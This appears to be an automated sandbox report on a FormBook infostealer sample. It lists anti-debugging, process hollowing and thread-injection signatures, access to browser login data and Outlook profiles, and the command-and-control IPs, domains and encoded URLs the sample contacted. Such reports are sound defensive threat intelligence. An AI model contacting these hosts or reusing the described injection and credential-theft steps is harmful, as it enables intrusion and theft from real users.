Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h] 3_2_00B44D3B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h] 3_2_00B44D3B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h] 3_2_00B3C577
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h] 3_2_00B3C577
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B37D50 mov eax, dword ptr fs:[00000030h] 3_2_00B37D50
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B53D43 mov eax, dword ptr fs:[00000030h] 3_2_00B53D43
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B93540 mov eax, dword ptr fs:[00000030h] 3_2_00B93540
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BC3D40 mov eax, dword ptr fs:[00000030h] 3_2_00BC3D40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00BE0EA5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00BE0EA5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00BE0EA5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B946A7 mov eax, dword ptr fs:[00000030h] 3_2_00B946A7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAFE87 mov eax, dword ptr fs:[00000030h] 3_2_00BAFE87
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B276E2 mov eax, dword ptr fs:[00000030h] 3_2_00B276E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B416E0 mov ecx, dword ptr fs:[00000030h] 3_2_00B416E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00BE8ED6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B58EC7 mov eax, dword ptr fs:[00000030h] 3_2_00B58EC7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B436CC mov eax, dword ptr fs:[00000030h] 3_2_00B436CC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00BCFEC0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCFE3F mov eax, dword ptr fs:[00000030h] 3_2_00BCFE3F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1E620 mov eax, dword ptr fs:[00000030h] 3_2_00B1E620
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h] 3_2_00B4A61C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h] 3_2_00B4A61C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h] 3_2_00B1C600
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h] 3_2_00B1C600
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h] 3_2_00B1C600
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B48E00 mov eax, dword ptr fs:[00000030h] 3_2_00B48E00
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1608 mov eax, dword ptr fs:[00000030h] 3_2_00BD1608
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00B3AE73
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00B3AE73
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00B3AE73
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00B3AE73
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00B3AE73
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2766D mov eax, dword ptr fs:[00000030h] 3_2_00B2766D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h] 3_2_00B27E41
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h] 3_2_00BDAE44
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h] 3_2_00BDAE44
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B28794 mov eax, dword ptr fs:[00000030h] 3_2_00B28794
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h] 3_2_00B97794
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h] 3_2_00B97794
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h] 3_2_00B97794
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B537F5 mov eax, dword ptr fs:[00000030h] 3_2_00B537F5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4E730 mov eax, dword ptr fs:[00000030h] 3_2_00B4E730
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h] 3_2_00B3B73D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h] 3_2_00B3B73D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h] 3_2_00B14F2E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h] 3_2_00B14F2E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3F716 mov eax, dword ptr fs:[00000030h] 3_2_00B3F716
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h] 3_2_00BAFF10
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h] 3_2_00BAFF10
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h] 3_2_00BE070D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h] 3_2_00BE070D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h] 3_2_00B4A70E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h] 3_2_00B4A70E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2FF60 mov eax, dword ptr fs:[00000030h] 3_2_00B2FF60
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8F6A mov eax, dword ptr fs:[00000030h] 3_2_00BE8F6A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2EF40 mov eax, dword ptr fs:[00000030h] 3_2_00B2EF40
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040CF93 LdrLoadDll, 3_2_0040CF93
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004018B6 SetUnhandledExceptionFilter, 1_2_004018B6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040632B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BB3

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Network Connect: 81.17.29.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 72.14.185.43 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\mcwfy.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3324 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe Jump to behavior
Source: explorer.exe, 00000004.00000000.328321537.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.571846473.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.566841892.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004019C5 cpuid 1_2_004019C5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040163B
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 830804 Sample: u8QPnVhq0N.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 2 other signatures 2->43 9 u8QPnVhq0N.exe 19 2->9         started        process3 file4 29 C:\Users\user\AppData\Local\Temp\mcwfy.exe, PE32 9->29 dropped 12 mcwfy.exe 1 9->12         started        process5 signatures6 57 Multi AV Scanner detection for dropped file 12->57 59 Detected unpacking (changes PE section rights) 12->59 61 Machine Learning detection for dropped file 12->61 63 2 other signatures 12->63 15 mcwfy.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 20 explorer.exe 1 1 15->20 injected process9 dnsIp10 31 un-object.com 192.185.17.12, 49716, 80 UNIFIEDLAYER-AS-1US United States 20->31 33 www.222ambking.org 91.195.240.94, 49704, 49705, 80 SEDO-ASDE Germany 20->33 35 13 other IPs or domains 20->35 45 System process connects to network (likely due to code injection or exploit) 20->45 47 Performs DNS queries to domains with low reputation 20->47 24 cmstp.exe 13 20->24         started        27 autoconv.exe 20->27         started        signatures11 process12 signatures13 49 Tries to steal Mail credentials (via file / registry access) 24->49 51 Tries to harvest and steal browser information (history, passwords, etc) 24->51 53 Modifies the context of a thread in another process (thread injection) 24->53 55 Maps a DLL or memory area into another process 24->55
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.187.128.34
 thedivinerudraksha.com United States
55293 A2HOSTINGUS true
91.195.240.94
 www.222ambking.org Germany
47846 SEDO-ASDE true
78.141.192.145
 gritslab.com France
20473 AS-CHOOPAUS true
161.97.163.8
 www.bitservicesltd.com United States
51167 CONTABODE true
81.17.29.149
 www.younrock.com Switzerland
51852 PLI-ASCH true
192.185.17.12
 un-object.com United States
46606 UNIFIEDLAYER-AS-1US true
94.176.104.86
 white-hat.uk Romania
5588 GTSCEGTSCentralEuropeAntelGermanyCZ true
213.145.228.111
 www.energyservicestation.com Austria
25575 DOMAINTECHNIKAT true
72.14.185.43
 www.thewildphotographer.co.uk United States
63949 LINODE-APLinodeLLCUS true
199.192.30.147
 www.shapshit.xyz United States
22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
www.bitservicesltd.com 161.97.163.8 true
www.younrock.com 81.17.29.149 true
www.energyservicestation.com 213.145.228.111 true
www.thewildphotographer.co.uk 72.14.185.43 true
www.shapshit.xyz 199.192.30.147 true
www.222ambking.org 91.195.240.94 true
thedivinerudraksha.com 85.187.128.34 true
un-object.com 192.185.17.12 true
white-hat.uk 94.176.104.86 true
gritslab.com 78.141.192.145 true
www.un-object.com unknown unknown
www.white-hat.uk unknown unknown
www.gritslab.com unknown unknown
www.thedivinerudraksha.com unknown unknown
www.fclaimrewardccpointq.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.thedivinerudraksha.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.energyservicestation.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.un-object.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.thewildphotographer.co.uk/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.bitservicesltd.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.gritslab.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.shapshit.xyz/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.222ambking.org/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown
http://www.younrock.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p true
  • Avira URL Cloud: malware
 unknown